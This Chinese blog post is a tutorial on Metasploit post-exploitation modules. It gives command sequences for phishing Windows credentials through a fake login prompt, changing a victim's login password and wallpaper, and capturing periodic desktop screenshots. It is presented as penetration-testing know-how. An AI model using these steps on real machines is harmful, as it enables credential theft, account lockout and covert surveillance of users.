首页 > 其他分享 >MSF中好玩的Post 模块

MSF中好玩的Post 模块

时间:2023-08-25 14:05:54浏览次数:47  
标签:use set run session 模块 MSF Post 好玩 post

一旦受害者机器必须被者入侵,测试者可以使用msf后期利用模块来收集有关受害者的信息或证据。metasploit 框架中有478 个后期开发模块可用,在 post 模块的帮助下,让后期的测试会变得更有趣。

本文将为你介绍常用的几个post模块的使用,感兴趣就收藏吧!

如下,当我们成功得到系统的shell后,便可以建立有趣的post模块 了。

MSF中好玩的Post 模块_Windows

Windows凭据钓鱼

当我们无法得到系统管理员的密码时,可以利用此模块用于通过弹出登录提示框,对目标机器进行钓鱼。当受害者在登录提示中填写凭据时,凭据将发送给测试者。 要执行此,您需要执行以下命令。

use post/windows/gather/phish_windows_credentials
set session 1
run

效果如下所示:

MSF中好玩的Post 模块_Windows_02

当用户输入密码信息后

MSF中好玩的Post 模块_msf教程_03

修改桌面壁纸

该模块将授予您更改受害机器桌面壁纸的权限。

在继续之前,我们必须有 PNG 或 JPEG 格式的图像。之后,我们需要执行这些命令,如下所示。

use post/multi/manage/set_wallpaper
set session 4
set wallpaper_file /home/shubham/Desktop/1.png
run

只要我们执行这个模块,受害者的桌面壁纸就会成功改变。

更改密码

本模块将帮助我们更改目标机器的窗口登录密码。

multi/handler 上执行这些给定的命令来执行测试。注意:要执行此操作,我们必须具有管理员权限。

use windows/manage/change_password
set session 4
set old_password 123456789
set new_password 12345678
set smbuser hp
run

修改后,用旧密码便无法成功登录系统。

MSF中好玩的Post 模块_kali教程_04

Windows 屏幕收集

在这个模块中,测试者可以匿名获取受害者机器的桌面截图。

您需要在 multi/handler 上输入这些给定的命令。

use post/windows/gather/screen_spy
set session 10
set view_screenshots true
run

执行完后,我们会每5s得到一张桌面截图。

MSF中好玩的Post 模块_kali教程_05

标签:use,set,run,session,模块,MSF,Post,好玩,post
From: https://blog.51cto.com/dabiaoge/7230065

相关文章

  • 编程真好玩Python_2.1你的第一个程序HelloWorld
    一、作业效果。(1)程序首先显示信息:“你好,世界!”(2)询问你的名字(3)输入后,屏幕显示“你好,×××!”二、完成(1)新建文件夹,保存-命名(2)运行代码print("Hello,World!")person=input("Whatisyourname?\n")print("Hello,",person)(3)在编辑窗口中,选择Run-RunModule,运行程序......
  • 编程真好玩Python_1、认识Python
    一、什么是编程1、Scratch与Python区别Scratch是一种可视化的编程语言,适合于创作游戏、动画或者互动故事。Python使用文字来编程。二、IDLE结构1、壳窗口。壳窗口无法保存代码,但是Python打印的任何东西都会出现在壳窗口中。        2、编辑窗......
  • postgresql建表空间、建库、建模式、建用户的规范
    一、官方概念说明1、表空间(表空间位置不应该位于数据目录内)性能优化:您可以将高I/O的表和索引放在高速磁盘上,而将不经常访问的表放在普通的磁盘上。管理磁盘空间:当数据库存储空间不足时,可以通过表空间在其他磁盘上创建更多的存储空间。如果没有上面2个诉求,可以使用默认表空间......
  • Apipost:提升API开发效率的利器
    在数字化时代,API已经成为企业和开发者实现业务互通的关键工具。然而,API的开发、调试、文档编写以及测试等工作繁琐且复杂。Apipost为这一问题提供了完美的解决方案。Apipost是一款专为API开发人员设计的协同研发平台,旨在简化API的生命周期管理。Apipost提供了丰富的功能,让开发人......
  • PostgreSql中的timestampdiff
      近期项目从Mysql数据库,迁移的到PostgreSql数据库,其中代码中很多timestampdiff在PostgreSql缺少对应的函数。所以自己整理了一份createorREPLACEFUNCTIONtimestampdiff(HOURtext,create_timeTIMESTAMP,end_timeTIMESTAMP)RETURNSBIGINTas$$BEGINifu......
  • 【SDE】Centos7 离线安装 Postgresql 12 并配置 sde
    使用ArcGIS10.9.1对应的Postgresql12.7rpm包postgresql12-12.7-1PGDG.rhel7.x86_64.rpmpostgresql12-contrib-12.7-1PGDG.rhel7.x86_64.rpmpostgresql12-libs-12.7-1PGDG.rhel7.x86_64.rpmpostgresql12-server-12.7-1PGDG.rhel7.x86_64.rpmlibicu-50.2-4.el7_7.x......
  • API接口变更频繁,协作效率低?试试Apipost
    在团队协作开发和API管理过程中,API接口变更频繁、变更信息得不到及时同步且同步后沟通效率低,各个环节人员处理问题节奏不统一等等,都是在API开发中很多开发者面临的痛点。这些痛点可能会导致工作进度受阻、出现重复动作等多个问题,甚至给整个项目带来风险。这些问题在项目研发中是不......
  • 2、postgres数据导入
    目录postgres数据导入1、数据导入2、导入不存在数据库处理3、整库导入postgres数据导入1、数据导入psql-fuser_export.sql-hlocalhost-Umypguser-Wmypostgres参数说明:-f读取的sql文件-h导入的ip地址-U导入的用户-W导入指定的数据库2、导入不存在数据库处理......
  • 1、postgres数据导出
    目录postgres数据导出1、只导出所有对象的数据库结构2、只导出对应的数据库与数据3、只导出所有的表数据4、整个数据库导出postgres数据导出1、只导出所有对象的数据库结构pg_dump-fuser_export.sql-i-C-EUTF8-nmyschema-s-Umypguser-hlocalhost-Wmypostgres......
  • 1、postgres删除与创建schema
    目录postgres删除与创建schema1、删除schema语法2、创建schemapostgres删除与创建schema1、删除schema语法dropschema[schema_name];或者dropschema[ifexists][schema_name][cascade][restrict];参数说明:参数说明dropschema关键字,删除schema固定语法......